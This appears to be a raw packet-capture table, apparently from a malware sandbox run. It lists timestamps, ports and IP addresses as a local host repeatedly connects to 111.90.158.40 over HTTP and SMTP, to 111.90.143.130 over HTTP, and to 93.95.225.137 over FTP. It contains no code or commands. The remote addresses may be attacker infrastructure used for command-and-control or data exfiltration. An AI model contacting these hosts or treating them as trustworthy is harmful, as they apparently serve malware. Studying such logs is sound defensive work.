May 29, 2024 14:25:29.513463020 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.521065950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.596826077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.596860886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.596894979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.596913099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.596923113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.596940994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.596988916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597018957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597034931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597047091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597050905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597062111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597076893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597085953 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597088099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597100973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597106934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597115993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597126961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597130060 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597151995 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597152948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597165108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597177029 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597189903 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597268105 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597294092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597302914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597311020 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597337008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597347021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.597378016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.597400904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598062038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598081112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598089933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598099947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598109961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598120928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598121881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598136902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598145962 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598159075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598334074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598345041 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598376989 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598401070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598412037 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598422050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.598438025 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.598463058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.658315897 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.658358097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.658368111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.658377886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.658389091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.658431053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.658463001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.788604021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.788623095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.788635015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.788646936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.788667917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.788691044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789261103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789273977 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789287090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789334059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789335966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789356947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789367914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789380074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789386988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789393902 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789403915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789416075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789427996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789433002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789452076 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789458990 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789463043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789474010 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789479017 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789499044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789516926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789632082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789648056 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789659023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789669991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789680004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789680004 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789693117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789704084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789707899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789714098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789726019 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789727926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789738894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789747953 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.789751053 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.789783955 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790210009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790235996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790246964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790272951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790290117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790297985 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790307999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790318966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790328979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790340900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790357113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790394068 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790507078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790555000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790594101 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790759087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790798903 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790812016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790822983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790833950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790858030 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790879965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790891886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790901899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790914059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790925026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790926933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790951967 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790965080 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.790987015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.790997982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791035891 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791253090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791280031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791290998 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791327000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791336060 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791338921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791364908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791374922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791374922 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791399956 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791414976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791436911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791451931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791505098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791554928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791567087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791590929 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791605949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791616917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791618109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791627884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791667938 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791722059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791733980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791743994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791759014 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791788101 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.791940928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.791966915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792120934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792160988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792177916 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792195082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792206049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792213917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792217016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792229891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792238951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792242050 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792267084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792356968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792397976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792422056 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792433023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792443037 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792453051 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792464018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792468071 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792500019 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792771101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792821884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.792860985 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.792929888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793001890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793014050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793040037 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793052912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793064117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793066978 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793071032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793087006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793098927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793104887 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793109894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793128014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793150902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793154001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793180943 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793242931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793427944 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793437958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793450117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793456078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793478012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793493032 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793493986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793507099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793517113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793524981 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793543100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793800116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793843031 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793876886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793886900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793899059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793915987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793926001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793929100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793942928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793953896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793958902 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793963909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793977976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.793982029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793992996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.793993950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.794003963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794014931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794025898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794032097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794038057 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.794044018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794069052 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.794078112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794090033 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794101954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.794120073 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.794145107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.923890114 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.929253101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.929312944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:31.211329937 CEST	49762	25	192.168.2.4	111.90.158.40
May 29, 2024 14:25:33.228321075 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:33.233421087 CEST	80	49763	111.90.158.40	192.168.2.4
May 29, 2024 14:25:33.233496904 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:33.233838081 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:33.238759041 CEST	80	49763	111.90.158.40	192.168.2.4
May 29, 2024 14:25:34.224801064 CEST	80	49763	111.90.158.40	192.168.2.4
May 29, 2024 14:25:34.224823952 CEST	80	49763	111.90.158.40	192.168.2.4
May 29, 2024 14:25:34.224891901 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:34.229618073 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:34.234811068 CEST	80	49763	111.90.158.40	192.168.2.4
May 29, 2024 14:25:34.234918118 CEST	49763	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:35.213751078 CEST	49762	25	192.168.2.4	111.90.158.40
May 29, 2024 14:25:36.223922968 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:36.228966951 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:36.229032993 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:36.232809067 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:36.237747908 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211481094 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211503029 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211513996 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211528063 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211539984 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211550951 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211591005 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211601973 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.211618900 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:37.211728096 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:37.300338984 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.314040899 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:37.319272041 CEST	80	49764	111.90.158.40	192.168.2.4
May 29, 2024 14:25:37.319381952 CEST	49764	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:37.384228945 CEST	21	49747	93.95.225.137	192.168.2.4
May 29, 2024 14:25:37.384397984 CEST	49747	21	192.168.2.4	93.95.225.137
May 29, 2024 14:25:37.384398937 CEST	49747	21	192.168.2.4	93.95.225.137
May 29, 2024 14:25:37.389343023 CEST	21	49747	93.95.225.137	192.168.2.4
May 29, 2024 14:25:42.298696041 CEST	49765	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:42.303757906 CEST	80	49765	111.90.143.130	192.168.2.4
May 29, 2024 14:25:42.303836107 CEST	49765	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:42.303961992 CEST	49765	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:42.308828115 CEST	80	49765	111.90.143.130	192.168.2.4
May 29, 2024 14:25:43.187705994 CEST	80	49765	111.90.143.130	192.168.2.4
May 29, 2024 14:25:43.191428900 CEST	49765	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:43.202442884 CEST	49765	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:43.207478046 CEST	80	49765	111.90.143.130	192.168.2.4
May 29, 2024 14:25:43.220510006 CEST	49762	25	192.168.2.4	111.90.158.40
May 29, 2024 14:25:47.760720015 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:47.766905069 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:47.767242908 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:47.768125057 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:47.773037910 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739342928 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739407063 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739415884 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739425898 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739434958 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739444017 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739444971 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:48.739454031 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739464998 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739475012 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739483118 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:48.739487886 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.739514112 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:48.739531994 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:48.744461060 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.744472027 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.744487047 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:48.744514942 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:48.798280001 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.019937038 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.019956112 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020013094 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.020143986 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020153999 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020204067 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.020555019 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020566940 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020582914 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020593882 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020606041 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.020615101 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.020629883 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.021203995 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.021224022 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.021234989 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.021251917 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.021279097 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.021280050 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.021292925 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.021338940 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.022116899 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022128105 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022138119 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022186995 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.022524118 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022542000 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022551060 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022562027 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022572041 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.022572994 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.022594929 CEST	49766	80	192.168.2.4	111.90.158.40
